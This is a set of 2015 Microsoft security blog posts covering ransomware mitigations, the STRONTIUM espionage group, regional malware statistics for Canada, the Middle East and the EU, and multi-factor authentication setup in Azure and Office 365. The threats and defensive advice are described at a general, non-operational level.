The fact that ransomware families aren’t very prevalent at this point is good news. But that doesn’t make it any less painful to the users and organizations that have been victimized. This is why Microsoft is so committed to continually raising the bar on attackers and helping our customers with these threats. There is a plethora of mitigations available for enterprise customers, both on-premises and cloud-based. Windows 10 has numerous advanced security features that can make it much harder for attackers to be successful with ransomware. The Office 365 Security team published an excellent article that provides some great mitigations, a highly recommended read: How to Deal with Ransomware.

Additionally, I asked some of the experts in Microsoft’s Enterprise Cybersecurity Group to provide some guidance based on the work they are doing to help enterprise customers protect, detect and respond to ransomware cases. The Enterprise Cybersecurity Group has unique, industry-leading cybersecurity expertise from client to cloud that I’m excited to tap. They have helped numerous enterprise customers protect, detect and respond to some of the most sophisticated ransomware attacks to date. This experience informs their approach, something partially summarized in the table below.

Detect Ingress protections
Auto-scale endpoint protections
Behavioral and deterministic detections leveraging Deep Packet Inspection
Protect Reputational services
High Value Asset protection, containment, isolation
Respond Response planning
Offline backups
Regular hunting and validation

We will share more from the Enterprise Cybersecurity Group in the next article in this series on ransomware.

Tim Rains
Director, Security
Microsoft

Defending against persistent attackers: What we’ve learned

Part of what we do at the Microsoft Malware Protection Center involves keeping tabs on known activity groups. This is some of the most interesting and intriguing work we do.

One particularly aggressive and persistent group we track is known within Microsoft by the code-name “STRONTIUM” (following our internal practice of assigning chemical element names to such groups).

Whereas most cyber-attack groups are ultimately profit-oriented, STRONTIUM mainly seeks sensitive information. Its primary targets include government bodies, diplomatic institutions, and military forces. The group has also been known to target journalists, political advisors, and organizations associated with political activism. With such lofty targets, you might expect the group to be highly sophisticated, and it is.

STRONTIUM primarily attempts to ensnare individuals using spear phishing tactics through email or social networking channels. The idea is to dupe people into giving up their login credentials so the group can perform reconnaissance on a target organization. Their lure messages are typically tied to current events such as an upcoming conference or real-world news, and STRONTIUM’s email senders are usually associated with well-known email providers, using plausible names and titles designed to give the messages credibility.

The ultimate goal of this reconnaissance phase is to compile a list of high-value individuals who have information or access that STRONTIUM wants. With this list at hand, the group moves to the next phase of operations — installing malware on the high-value targets’ computers and thereby gaining access to the institution’s network. Depending on the specific attack used, they might send a message with a link that will launch a drive-by download when clicked, or a malicious attachment such as a document file containing an exploit.

It is not yet clear whether the group researches vulnerabilities and develops the exploits themselves, or purchases them on the black market, but Microsoft researchers have observed STRONTIUM moving swiftly to take advantage of newly disclosed vulnerabilities. They are also known for zero-day exploits targeting vulnerabilities where the software vendor has not yet released a security update. STRONTIUM also targets older vulnerabilities that simply haven’t been patched by the organization, and attacks involving non-Windows computers are a concern as well.

Considering STRONTIUM’s broad range of technical capabilities and its determination to keep up an attack for months or years until it succeeds, the group represents a significant threat that is difficult to defend against. Nevertheless, there are steps an organization can take to significantly decrease the probability of a successful attack:

  • Deploy vendor security updates quickly after they are released. STRONTIUM looks for out-of-date software installations inside target institutions. Keeping software current denies the group this avenue of infiltration.
  • Take advantage of the latest mitigation technologies. Recent versions of Windows (most notably Windows 10) and other software include critical mitigations that can render many of STRONTIUM’s exploits ineffective.
  • Enforce segregation of privileges and apply all possible safety measures to protect Admin accounts. STRONTIUM relies on pass-the-hash techniques and elevation of privileges to successfully move laterally across networks.
  • Conduct enterprise software security awareness training. STRONTIUM heavily relies on social engineering to entice individuals into clicking links to malware. Security training can raise awareness around this attack vector.
  • Institute multi-factor authentication. As STRONTIUM extensively uses credential-stealing spear phishing attacks, multi-factor authentication can be an effective tool to prevent unauthorized access even if credentials are stolen.
  • Prepare your network to be forensically ready. A forensically ready network that records authentications, password changes, and other significant network events can help to quickly identify affected systems.
  • Keep personnel and personal data private. STRONTIUM uses open-source intelligence to obtain its initial lists of victims, which might include names and email addresses, but can expand into employment information and other items of interest. Make sure your email is kept confidential and privacy settings on social media don’t disclose sensitive information publicly. These are all pieces of information STRONTIUM can use to devise a realistic attack.

For a deeper look at the STRONTIUM adversary, including technical information that can help your IT department keep your organization safe, see the latest Microsoft Security Intelligence Report here.

To learn more about how Microsoft helps protect your security and privacy in the cloud, visit Trusted Cloud.

The Threat Landscape in Canada – 2015 Update

November 30th, 2015 No comments

I have written about the threat landscape in Canada a couple of times over the years. Using new data from the latest volume of the Microsoft Security Intelligence Report, volume 19, I thought I’d take a fresh look at what has been happening in Canada as its been about a year since I last published an article on it.

If you are interested in reading some of the analysis I have done on the threat landscape in Canada in the past, please read these articles The Threat Landscape in Canada, The threat landscape in Canada & SecTor 2012. Additionally, last month I had the opportunity to speak at the Security Education Conference Toronto (SECTor 2015), Canada’s largest cybersecurity conference. You can watch a video of the presentation I gave at the conference as well as a video interview I did there: Cyberthreats: Microsoft’s Tim Rains on Putting Old Wine in New Bottles.

Starting with the encounter rate (ER) in Canada, which is the percentage of computers running Microsoft real-time security software in Canada that reported detecting malware, or report detecting a specific threat or family, during a quarter.  Most of these encounters are from systems running Microsoft Security Essentials or Windows Defender (on Windows 8.1) reporting that they blocked malware from installing on them. As Figure 1 illustrates, the ER in Canada has been below the worldwide average for many quarters; the worldwide average encounter rate in the second quarter of 2015 (2Q15) was 14.8%, while the ER in Canada was 12.5% during the same period.

Figure 1: the long-term encounter rate (ER) for Canada and the worldwide average per quarter for the period between the 3rd quarter of 2012 through the 2nd quarter of 2015
113015_01

Although Canada’s ER has been below the worldwide average and that of France for some time, it has been elevated in some time periods compared to the ERs of the United Kingdom and the United States as illustrated in Figure 2.

Figure 2: the long-term encounter rates (ER) for Canada, France, the United Kingdom, the United States, and the worldwide average per quarter for the period between the 3rd quarter of 2012 through the 2nd quarter of 2015
113015_02

Figure 3 illustrates the long-term view of malware categories encountered by systems in Canada for the time period between the third quarter of 2012 (3Q12) and the second quarter of 2Q15. This data helps us understand the types of threats that Canadians encounter most frequently in each time period. Attackers change their tactics over time to favor malware types that they hope will successfully compromise systems. But any success they have is fleeting as Microsoft and the rest of the security industry update protections to mitigate any threats that attempt to become relatively prevalent.

Figure 3: the long-term view of malware category encounter rates (ER) for Canada per quarter for the period between the 3rd quarter of 2012 through the 2nd quarter of 2015
113015_03

Figure 3 shows us that the ER spike seen in Canada in 3Q14 was primarily due to an increase in encounters with malware families in the Trojan Downloaders & Droppers category. This category of threats was popular with attackers back in 2007, but we’ve seen a resurgence of these threats in more recent time periods.  The level of encounters with Exploits is also noteworthy as it suggests that Canadians have encountered exploit kits at relatively high frequency; Figures 4 and 5 support this supposition. Figure 4 shows us that the ER for Exploits was higher in Canada than the worldwide average in 2Q15. Figure 5 provides a list of the top 10 malware threats encountered by Canadians in 2Q15, where 3 of the top 10 malware families encountered in Canada were exploit kits.

Figure 4: malware category encounter rates for Canada versus the worldwide average in the 2nd quarter of 2015
113015_04

Figure 5: the top malware families encountered in Canada in the 2nd quarter of 2015
113015_05

Malware encounters are much more common than malware infections; i.e. a system has to encounter malware before there’s a chance for it to get infected with malware. On average, about 17.0 percent of reporting computers worldwide encountered malware over the four quarters ending in 2Q15. At the same time, the Microsoft Windows Malicious Software Removal Tool (MSRT) removed malware from about 7.1 out of every 1,000 computers, or 0.71 percent. Figure 6 illustrates the ER and the malware infection rate (CCM) for Canada and the worldwide average for recent time periods.

Figure 6: malware encounters and infections in Canada between the 3rd quarter of 2014 and the 2nd quarter of 2015
113015_06

Figure 7 provides the top 10 list of malware families that infected systems in Canada in 2Q15. Notice that many of the threats on this list are different from the list of threats that were encountered in Canada during the same period (Figure 5). Many of these threats leverage social engineering and require user interaction in order to infect systems. You can get additional details on many of these threats in the Microsoft Malware Protection Center’s malware encyclopedia.

Figure 7: top threat families by infection rate (CCM) in 2Q15
113015_07

A few noteworthy threats include Win32/Kilim, Win32/Alureon, and Win32/Zbot. Kilim is a threat family that can install malicious Google Chrome browser plug-ins and can then use your social media profiles to like, share, and follow pages without your permission. Alureon is a family of data-stealing Trojans can give a malicious hacker access to collect confidential information stored on a compromised PC, such as user names, passwords, and credit card data. They can also send malicious data to your PC and corrupt some driver files, making them unusable. Zbot is a family of Trojans that are created by kits known as “Zeus”. These kits are bought and sold on the black market and they can monitor online banking activities by hooking API addresses and injecting code into webpages.

Figure 8: top threat families by infection rate (CCM) in 2Q15
113015_08

Many times, compromised systems are used to host malware hosting sites, phishing sites, drive-by download sites, etc. The relative levels of these web-based threats differ by country/region. Figure 8 shows us that in Canada levels of Phishing sites and malware hosting sites are slightly elevated above the worldwide average. To help put this into context, an example of a location with very high level of phishing sites is Bulgaria with 98.5 phishing sites per 1,000 hosts. A location with a high number of malware hosting sites is Brazil with 40.97 malware hosting sites per 1,000 hosts.

I hope you’ve found this analysis useful.

Tim Rains
Chief Security Advisor
Enterprise Cybersecurity Group

Microsoft Security Intelligence Report Volume 19 is now available

November 18th, 2015 No comments

We’ve just published hundreds of pages of new threat intelligence available for free download at www.microsoft.com/sir.

This includes threat data from the first half of 2015 as well as longer term trend data on the industry vulnerabilities, exploits, malware, and malicious websites that your organization should use to assess your current security posture. We are also providing threat data for over 100 countries/regions.

Additionally, this volume of the report includes a case study and profile on a determined adversary code name “Strontium.” This case study provides insight into the techniques that these modern threat actors are using. My colleagues in the Microsoft Malware Protection Center have written an article on Strontium that will give you more details and context: http://blogs.technet.com/b/mmpc/archive/2015/11/18/microsoft-security-intelligence-report-strontium.aspx.

Also included in this volume of the report is an in-depth look at the malware behind much of the bank fraud that has characterized the threat landscape in Brazil for the better part of the last decade. This is required reading for financial services customers.

One of my favorite new data-sets in this report is exploit detection data from the IExtensionValidation interface in Internet Explorer 11. Essentially this interface enables real-time security software to block ActiveX controls from loading on malicious web pages. When Internet Explorer loads a webpage that includes ActiveX controls, if the security software has implemented IExtensionValidation, the browser calls the security software to scan the HTML and script content on the page before loading the controls themselves. If the security software determines that the page is malicious (for example, if it identifies the page as an exploit kit landing page), it can direct Internet Explorer to prevent individual controls or the entire page from loading. The interface helps protect our customers and the data it provides helps us understand how attackers are evolving their web-based attacks such as drive-by download attacks and watering hole attacks. The data in figure 1 shows how attackers have shifted from attacking Flash and Java controls in almost the same frequency to targeting Flash almost 100% of the time. This illustrates the importance of ensuring that Flash is being patched efficiently in your environment.

Figure 1: ActiveX controls detected on malicious webpages through IExtensionValidation, 3Q14–2Q15, by control type
111615_01

And of course, the report also contains the guidance your organization can use to protect its data and assets.

You can download Volume 19 of the Microsoft Security Intelligence Report at www.microsoft.com/sir.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

Historic High Infection Rates – The Threat Landscape in the Middle East

October 21st, 2015 No comments

I have written about the threat landscape in the Middle East extensively over the years. It’s been about 18 months since I published my last article on this part of the world and malware infection rates in some locations in the region have since risen to historic highs – far above the highest malware infection rates ever published in the Microsoft Security Intelligence Report. So I thought I’d take a fresh look at what has been happening in some locations in the Middle East.

If you are interested in some of the analysis and insights that we have published in the past, here are some of the most recent articles:

The Threat Landscape in the Middle East and Southwest Asia – Part 1: Relatively High Malware Infection Rates
The Threat Landscape in the Middle East and Southwest Asia – Part 2: Relatively High Malware Encounter Rates
The Threat Landscape in the Middle East and Southwest Asia – Part 3: Regional Anti-virus Software Usage
The Threat Landscape in the Middle East and Southwest Asia – Part 4: Regional Windows XP Market Share
Threat Landscape in the Middle East and Southwest Asia – Part 5: Socio-economic Factors and Regional Malware Infection Rates
Threat Landscape in the Middle East and Southwest Asia – Part 6: Best Practices from Locations with Low Malware Infection Rates
Regime Stability, Demographic Instability and Regional Malware Infection Rates – Part 1: Egypt
Regime Stability, Demographic Instability and Regional Malware Infection Rates – Part 2: Syria
The Threat Landscape in the Middle East – Part 3: Israel and Saudi Arabia

The malware infection rates (CCM) in the Middle East have typically been well above the worldwide average. The exception has tended to be Israel where the infection rate has closely mirrored the worldwide average during many time periods as seen in Figure 1.

Before I explore what happened in late 2013 and 2014 to drive infection rates significantly higher in all the locations listed in Figure 1, you might also be wondering about Qatar’s relatively high infection rate in the first quarter of 2011 (1Q11) that can be seen in Figure 1? You can read about that in a previously published article: The Threat Landscape in the Middle East – Part 1: Qatar.

Figure 1: the malware infection rates (CCM) for Egypt, Iraq, Israel, Oman, the Palestinian Authority, Qatar, Saudi Arabia, Syria, the United Arab Emirates, and the worldwide average per quarter for the years 2011 through 2014
102115_01

All of the locations listed in Figure 1 had malware infection rates above the worldwide average in all four quarters of 2014. There is a clear increase in the CCM in most of these locations starting in the fourth quarter of 2013 (4Q13) or the first quarter of 2014 (1Q14). Qatar and the United Arab Emirates (UAE) saw increases in CCM in 4Q13; Qatar’s CCM increased 2.4 times from 11.4 to 27.7, while the UAE’s CCM increased 2.8 times from 12.2 to 34.0. But then the CCM in both locations leveled out and decreased in the last half of 2014, as did the worldwide average. Several other locations that saw their CCMs increase in 4Q13, continued to see large CCM increases in the following quarter.

One of the largest infection rate increases was in Iraq. The CCM in Iraq increased from 31.3 in 4Q13 to 110.7 in 1Q14, a 3.5 times increase. Examining the threat families responsible for this very large increase leads us to two families: MSIL/Bladabindi and Win32/Jenxcus. Detection for Bladabindi was added to the Microsoft Windows Malicious Software Removal Tool (MSRT) in January of 2014. Subsequently, Bladabindi was found and removed from 27.9 systems for every 1,000 systems that the MSRT executed on in Iraq in 1Q14. Detection for Jenxcus was added to MSRT in February of 2014 and it was also a prevalent threat in the region, found and removed from 25.2 systems for every 1,000 systems that the MSRT executed on in Iraq during the same period. The sudden increase in detections of these two families is the primary reason for the infection rate increase in Iraq at the beginning of 2014 and the subsequent decrease over time as fewer and fewer systems were found to be infected with these two families of threats.

MSIL/Bladabindi can steal sensitive information and send it to a malicious hacker. This threat family can also download other malware and provider attackers with backdoor access on compromised systems. Variants of this family can spread via infected removable drives, such as USB flash drives. They can also be downloaded by other malware, or spread though malicious links and hacked websites. Bladabindi variants are usually installed with an enticing name and icon to trick people into running it.

Win32/Jenxcus uses social engineering to trick the victim into running a malicious script file that is commonly bundled with other programs. When the program bundle is executed Jenxcus runs silently in the background. Win32/Jenxcus also operates as a worm that detects whether the victim’s system has a removable drive connected to it. If it does, it copies itself onto that drive. It also creates a shortcut link pointing to its copy in the removable drive. Typically, this threat gets onto vulnerable systems via drive-by download attacks or via infected removable drives.

Beyond the CCM increase seen in Iraq, Figure 1 illustrates smaller but similar CCM increases for several other locations in the region including Egypt, Oman, Palestinian Authority (West Bank and Gaza Strip), Saudi Arabia, and Syria. Win32/Jenxcus was the primary threat family driving CCMs higher in the first quarter of 2014 in all of these locations except Syria.

In Syria Win32/Gamarue and Win32/Sality were responsible for driving the infection rate from a CCM of 34.0 in the fourth quarter of 2013 to 75.5 in the first quarter of 2014.

Besides Win32/Jenxcus, Sality also contributed to the infection rate increase in Egypt, where it has been a prevalent threat for some time. I’ve written about this before: Are Viruses Making a Comeback? Egypt’s CCM increased to 73.2 in the first quarter of 2014 from 27.6 the prior quarter, a 2.7 times increase.

Whereas infection rate (CCM) data comes from the Malicious Software Removal Tool, the encounter rate (ER) is the percentage of computers running Microsoft real-time security software that report detecting malware, or report detecting a specific threat or family, during a period. Most of these encounters are from systems running Microsoft Security Essentials or Windows Defender (on Windows 8.1) reporting that they blocked malware from installing on them. For example, the worldwide average encounter rate in the fourth quarter of 2014 (4Q14) was 15.9%. As seen in Figure 2, with the exception of Israel, several locations in the Middle East have significantly higher than average ERs. I can’t show you the ER for all the countries we have CCM data for, as we don’t have enough systems reporting ER data from some of the locations in the region during this period of time.

Figure 2: the encounter rates (ER) for Egypt, Iraq, Israel, Qatar, Saudi Arabia, the United Arab Emirates, and the worldwide average per quarter for the period between the 3rd quarter of 2013 through the 4th quarter of 2014
102115_02
Notice how the ER increases in the third quarter of 2013 (3Q13) as opposed to the first quarter of 2014 where we saw large increases in infection rates in the region. A few threats were involved in this increase. In most of these locations Win32/Rotbrow, Win32/Brantall, and INF/Autorun, and VBS/Jenxcus all contributed to higher ERs during this period of time.

Malware families that use Autorun feature abuse (Win32/Autorun), have been some of the most prevalent threats encountered in the region for many years. These threats typically spread via USB drives and other removal media. I theorize that this type of threat is encountered in the Middle East so much because Internet connectivity is inconsistent in some locations, likely due to higher than average strife in places like Syria, Egypt, and Iraq. Subsequently, I postulate that people in these locations transfer files using removable media more often than many other places, exposing more systems to Autorun attacks. It’s just an educated guess. I have written about this threat before: Defending Against Autorun Attacks.

Figure 3: infographic to the right which shows how these worms can spread Autorun infographic that shows how these worms can spread
102115_03

A drive-by download site is a website that hosts one or more exploits that target vulnerabilities in web browsers and browser add-ons. Users with vulnerable computers can be infected with malware simply by visiting such a website, even without attempting to download anything. Drive-by download pages are usually hosted on legitimate websites to which an attacker has posted exploit code. Attackers gain access to legitimate sites through intrusion or by posting malicious code to a poorly secured web form,

like a comment field on a blog. Compromised sites can be hosted anywhere in the world and concern nearly any subject imaginable, making it difficult for even an experienced user to identify a compromised site from a list of search results.

Figure 4: Drive-by download pages indexed by Bing at the end of the fourth quarter of 2014 (4Q14), per 1,000 URLs in each country/region102115_04
Only Syria stands out with substantially higher concentrations of drive-by download sites in the region during 3Q13, 4Q13, and 4Q14.

Figure 5: Concentration of drive-by download URLs tracked by Bing in select locations in the Middle East on a reference date at the end of the associated quarter, expressed as the number of drive-by download URLs per every 1,000 URLs hosted in the country/region.
102115_05

I asked Cyril Voisin, Microsoft’s Chief Security Advisor in the Middle East and Africa, who is based in the UAE, how people in the region should protect themselves. The following is what Cyril recommended.

Arabic peninsula and Northern Africa countries were particularly affected by MSIL/Bladabindi and Win32/Jenxcus as these were part of attacks targeting Arabic speaking people, making them less suspicious as their language was used in order to lure them. For our larger MEA region, as well as for any other location in the world, I think the number 1 protection is the vigilance of users.

At the end of the day this boils down to:

  • Stay aware of risks and use your judgement as your best defense. And please spread the word by talking to your family and community members to increase their online safety. Anytime you are about to take any potentially harmful decision, reflect before you act and look for clues indicating phishing. Would this person really write to me in a foreign language to warn me about a picture were I look funny? Would this website confirm an order I did not make without calling me by my name? Would my bank require new urgent security information without notice? And of course everyone proposing to share their fortune with you only wants to get your money to build their own fortune… Finally beware of tech support phone scams where someone will call you directly and try to manipulate you over the phone, pretending for instance to be working for Microsoft support and asking you to install software on your machine, in order to take control of it.
  • Enforce basic hygiene. Again, this is not new, and with the risk of sounding as a broken record, I would like to remind everyone about the basics. If you want to skip that section, one recommendation though: upgrade to Windows 10 to benefit from all the security work that has been done to enhance your protection and automate some of the tasks below and beyond.
    • Keep everything up to date (all software on your PC, your tablet, your smartphone): that means applying updates for your system and applications, including browser, plug-ins, music software… as newer software is better for security.
    • Run an up-to-date antimalware solution and keep in mind that the presence of this security tool does not mean you can take inconsiderate risks
    • Use a firewall
    • Choose good passwords where they are necessary. Hint: Windows Hello and Microsoft Passport are your friends.

I hope you found this analysis informative and useful. You can find the latest data on the locations I examined in this series and many others at http://microsoft.com/sir.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

Cloud security controls series: Multi-factor Authentication

July 20th, 2015 No comments

Recently I wrote an article on the risk of leaked credentials in which I discussed how credentials are stolen in bulk directly from organizations’ websites. As illustrated in Figure 1, during the eight months between November 2013 and June 2014, Microsoft tracked about 1,700 distinct website credential thefts, comprising a little more than 2.3 million credentials that were posted in public places on the Internet. This number represents only a small fraction of the credentials that are traded in forums and specialized websites on less publicly accessible spaces on the Internet that cater to the illicit trade in stolen credentials. This problem is amplified in cases where victims have used the same credentials for access to multiple different service accounts on the Internet. Additionally, many of the high profile network compromises you have heard about over the past several years all had a phishing component in the attack. In many cases someone with a valid user name and password was tricked into disclosing those credentials in a phishing attack that subsequently provided attackers with a way into their infrastructure. Figure 2 illustrates that SmartScreen Filter reported 10.2 phishing attempts per 1,000 unique IP addresses in June 2014. Computers in Western Europe were disproportionately affected by phishing attempts. Four of the 10 locations reporting more than 20 phishing impressions per 1,000 unique IP addresses in June 2014 were in Western Europe: Italy (35.0), France (27.3), Belgium (26.1), and Spain (23.4). Other locations reporting high rates of phishing impressions include Venezuela (24.9) and South Africa (22.0).

Figure 1 (left):  Number of stolen credentials from publicly-posted credential thefts, per month, from November 2013 to June 2014, data from the Microsoft Security Intelligence Report volume 17; Figure 2 (right): Computers reporting phishing impressions per 1,000 unique client IP addresses in June 2014, data from the Microsoft Security Intelligence Report volume 17
0720 Figure 10720 Figure 2

In a world where hundreds of millions of leaked credentials are bought and sold regularly, and phishing attacks are so common and effective, many of the CISOs I talk to have come to the conclusion that passwords, even complex passwords and passphrases, by themselves are no longer sufficient to protect many of the resources that they are entrusted with. After all, even if all the passwords and passphrases meet all of their organization’s password complexity requirements, if attackers have a massive list of leaked credentials they can use to find valid credentials in, the complexity of those credentials isn’t really a mitigating factor for that type of risk.  Most of the CISOs I have talked to have implemented or plan to implement some form of multi-factor authentication as a control that helps mitigate some of these attacks. Multi-factor authentication adds one or more factors to the authentication process so that in addition to something the user knows (a password or pin), successful authentication also relies on something the user has (like a token generator, a smartcard, a specific device or application) or something the user is (biometrics like facial recognition or using iris or fingerprint scans). These additional factors make it harder for attackers to use leaked or stolen credentials to gain illegal access to systems. Security professionals use multi-factor authentication to help manage authentication in many on-premise scenarios including logging into Windows and authenticating to Active Directory, VPN, Direct Access, Exchange, Terminal Services, web applications, etc. In some cases multi-factor authentication helps organizations meet their compliance requirements.

When I have conversations about Microsoft’s Cloud services with customers, one of the first security controls I get asked about is multi-factor authentication. Naturally, security professionals that have implemented multi-factor authentication in their on-premise environments want to know they have the option to also use it to help protect users, data, and applications in the Cloud. Multi-factor authentication is available for Microsoft Cloud services and there are several configuration options to choose from depending on the service and assets you are trying to protect. Some of these options include Multi-factor Authentication for Azure Administrators, Azure Multi-factor Authentication, and Azure Multi-factor Authentication Server, Multi-factor Authentication for Office 365.

Azure Multi-factor Authentication is the multi-factor authentication service for Azure Active Directory. It helps to protect whatever assets you have protected with Azure Active Directory authentication including Cloud applications like Microsoft Office 365, OneDrive for Business, and Windows Intune. It can also be used to protect applications you develop on-premise as well as the thousands of SaaS applications available through Azure’s Application Gallery (screen shot in Figure 3), thus providing a more secure, single sign-on experience for people in your organization.

Figure 3: A screen shot of the Azure Application Gallery in the Azure portal, currently with 2,494 popular SaaS applications available
0720 Figure 3

When enabled, Azure Multi-factor Authentication can be configured to require users to use a mobile app, phone call, or text message after entering a valid password when authenticating to Cloud-based or on-premise applications. You can enforce multi-factor authentication on individual users or on specific applications. For example, let’s say your organization had a corporate LinkedIn account. You can provide access to that application to specific users in your organization via Azure Active Directory so they can access it via the app access panel at http://myapps.microsoft.com/. You could enforce multi-factor authentication for specific users so they have to use multiple factors when they logon to the app access panel or when they launch LinkedIn in the app access portal. Figure 4 illustrates how this is configured.  in the configuration settings for that application, I had the option to require multi-factor authentication for the users of that application or any of the other applications I have added in my Azure Active Directory.

Figure 4: How the Azure administrator adds the LinkedIn app to Azure Active Directory Applications in the Azure Portal and configuring multi-factor authentication, so that users can access the application from the Azure app access panel
0720 Figure 4a 0720 Figure 4b
0720 Figure 4c
0720 Figure 4d

Figure 5: A user logs into the Azure app access panel and sees they have been given access to the LinkedIn application; when the user launches LinkedIn from the Azure app access panel for the first time after multi-factor authentication has been enabled on the application, the user is prompted to set up the second factor for use in authentication after they successfully authenticate with their user name and password; the user can select the method they want to use for a second factor; the user selected “Mobile app” in this example and has some configuration options available; instructions are then presented to help the user install the mobile app on their smartphone – essentially installing the multi-factor authentication app from the appropriate app store and scan the barcode
0720 Figure 5a 0720 Figure 5b
0720 Figure 5c 0720 Figure 5d
0720 Figure 5e

You can enable the multi-factor authentication service for on-premises applications by using Azure Multi-factor Authentication Server that can be downloaded from the Azure Portal, as seen in Figure 7. Multi-Factor Authentication for Azure Administrators allows every administrative account of an Azure subscription to be protected by multi-factor authentication. So even if your organization decides not to implement multi-factor authentication for all users, the organization’s Azure administrators have the option to enable it for their accounts.

Figure 6: Advanced configuration for Azure Multi-factor Authentication
0720 Figure 6a
0720 Figure 6b

Figure 7: The Server download option for Azure Multi-factor Authentication Server
0720 Figure 7

One tip about multi-factor authentication providers in Azure, as illustrated in Figure 8. You only need to configure a multi-factor authentication provider if you aren’t getting Azure Multi-factor Authentication as part of the service you are using. If you are using Azure Active Directory Premium edition or Office 365 or Multi-Factor Authentication for Azure Administrators, then Azure Multi-factor Authentication is provided for free as part of these offerings. If you plan to use Azure Multi-factor Authentication as a stand-alone service, then you’ll have to create a multi-factor authentication provider to pay for that service. If you create a multi-factor authentication provider when you don’t really need to, you’ll likely pay for Azure Multi-factor Authentication when you don’t really need to – so ensure you need a multi-factor authentication provider before you create one.

Figure 8: Multi-factor Authentication Providers found in the Azure portal under the Active Directory in the left navigation bar, then click the “MULTI-FACTOR AUTH PROVIDERS” tab
0720 Figure 8

There are a lot of great resources that the Microsoft Azure Active Directory team have published on this topic:
Azure Multi-Factor Authentication
Getting started with Windows Azure Multi-Factor Authentication
Azure Multi-Factor Authentication Story
Securing access to cloud services – Information for Administrators
Adding Multi-Factor Authentication to Azure Active Directory
Configuring Azure Multi-Factor Authentication
Azure Multi-Factor Authentication FAQ
Enabling Multi-Factor Authentication for On-Premises Applications and Windows Server
Building Multi-Factor Authentication into Custom Apps (SDK)
Multi-Factor Authentication for Azure AD (video)

As I mentioned earlier, many of the enterprise customers I talk to have already invested in on-premise identity management solutions to meet specific security or compliance objectives they have. They use technologies such as Active Directory Federation Services (AD FS), certificate based authentication, physical smart cards or virtual smart cards. Both Microsoft and third-party authentication methods are available in Windows Server 2012 R2 AD FS. For example, using Windows Server 2012 R2 on-premise, once installed and registered with AD FS, you can enforce multi-factor authentication as part of the global or per-relying-party authentication policy. There are a bunch of providers with multi-factor authentication offerings available for AD FS in Windows Server 2012 R2. Currently these include offerings from Gemalto, inWebo Technologies, Login People, RSA, SafeNet, Swisscom and Symantec. Microsoft Azure Multi-factor Authentication will also work in this scenario. More background information long with the steps to do this are available: Manage Risk with Additional Multi-Factor Authentication for Sensitive Applications.

Figure 9: An illustration of how Azure Multi-factor Authentication Server can be integrated to manage authentication requests from on-premise applications
0720 Figure 9

Figure 10 (left): Installing the AD FS Adapter in the Azure Multi-factor Authentication Server after it has been installed and activated; Figure 11 (right): Configuring the AD FS Global Authentication Policy to use Azure Multi-factor Authentication
0720 Figure 10a 0720 Figure 10b

There are a bunch of other resources available related to using AD FS multi-factor authentication:

Microsoft Azure Multi-Factor Authentication Deep Dive: Securing Access on Premises and in the Cloud (video)
Active Directory Federation Services Overview
Getting started with Azure Multi-Factor Authentication and Active Directory Federation Services
Securing cloud resources with Azure Multi-Factor Authentication and AD FS
Secure cloud and on-premises resources using Azure Multi-Factor Authentication Server with Windows Server 2012 R2 AD FS
Secure cloud and on-premises resources using Azure Multi-Factor Authentication Server with AD FS 2.0
Building Multi-Factor Authentication into Your Applications Using the SDK
Windows Azure: Authenticate Windows Azure with ADFS
Windows Azure Multi-Factor Authentication Server (video)
Taking advantage of Identity capabilities in the Azure Pack (video)

For Office 365, multi-factor authentication can be used to protect both Office 365 administrative accounts and Office 365 user accounts. Multi-factor Authentication for Office 365 is powered by Azure Multi-factor Authentication, and works exclusively with Office 365 applications and is managed from the Office 365 portal. It’s available for all the different SKUs of Office 365. Once enabled, users are required to acknowledge a phone call, text message, or an app notification on their smartphone after correctly entering their password. Only after this second authentication factor has been satisfied does the user get access to Office 365 resources. The Office 365 team has published some great articles and videos that you can use to learn more about Multi-factor Authentication for Office 365:

Multi-Factor Authentication for Office 365
Webcast: Office 365 sign-in with Multi-Factor Authentication
Set up multi-factor authentication for Office 365
Security in Office 365 White Paper

As you can see, you have several options that make it easy to enable multi-factor authentication to help protect administrator and user credentials used to access on-premise applications, Office 365 applications, Azure-based applications, and thousands of third party Cloud SaaS applications.

Tim Rains
Chief Security Advisor
Worldwide Cybersecurity & Data Protection

The Latest Picture of the Threat Landscape in the European Union – part 2

June 29th, 2015 No comments

In part 1 of this series on the threat landscape in the European Union (EU) I examined the encounter and infection rates among EU member countries/regions, focusing on a couple of the locations with highest malware encounter rates (ER) and infection rates (CCM).

In part 2 of the series I’ll focus on the locations in the EU with the lowest ERs and CCMs, I’ll also examine the top threats found in the region in the last half of 2014.

Figure 1 illustrates the locations in the EU that have the lowest ERs. Finland, Denmark, Sweden, Ireland, Germany, and Austria had the lowest ERs in the EU in the last quarter of 2014. These locations have consistently had lower ERs than the worldwide average.

Figure 1: Locations with the lowest encounter rates in the EU in the third (3Q14) and fourth (4Q14) quarters of 2014

Taking a closer look at Finland in Figure 2, the location with the lowest ER in the EU, we can see every category of threat is encountered significantly less frequently by systems in Finland than the worldwide average.
0629_Figure1

Figure 2: (left) malware categories encountered in Finland in the fourth quarter of 2014 compared to the worldwide averages; (right); unwanted software categories encountered in Finland and worldwide during the last quarter of 2014
0629_Figure2

Although Norway is not a member of the EU, my coworkers and many of the customers I have met in Norway would want me to mention that Norway is another location in the region with one of the healthiest ecosystems in the world, as is Japan.

Figure 3: (left) Encounter and infection rates for Norway during each quarter of 2014; (right) Encounter and infection rates for Japan during each quarter of 2014
0629_Figure3

Looking at the locations in the EU with the lowest malware infection rates we can see some of the locations with the lowest ERs in the region also have low infection rates, including Finland, Denmark, Sweden, Ireland, and Austria. Estonia had a consistently low infection rate through all four quarters of 2014. We didn’t have enough data to publish an ER for Luxembourg, but its infection rate was consistent with other low infection rate locations in the region during 2014. The Netherlands also has consistently low infection rates.

Figure 4: Locations in the EU with the lowest malware infection rates (CCM) in the last quarter of 2014
0629_Figure4

Although there are locations in the EU with consistently low infection rates, this doesn’t mean those locations don’t experience temporary dramatic infection rate increases. For example, Figure 5 illustrates some dramatic infection rate increases that took place in Austria and the Netherlands in 2011 when the Win32/EyeStye Trojan (also known as SpyEye) was detected and cleaned from a relatively large number of systems in Austria, the Netherlands, Germany and Italy. I visited numerous enterprise customers in the region during that time period to discuss this threat with them.

Figure 5: (left) The infection rate trend for Austria between the third quarter of 2011 and the second quarter of 2013; (right) the infection rate trend for the Netherlands between the third quarter of 2011 and the fourth quarter of 2012
0629_Figure5

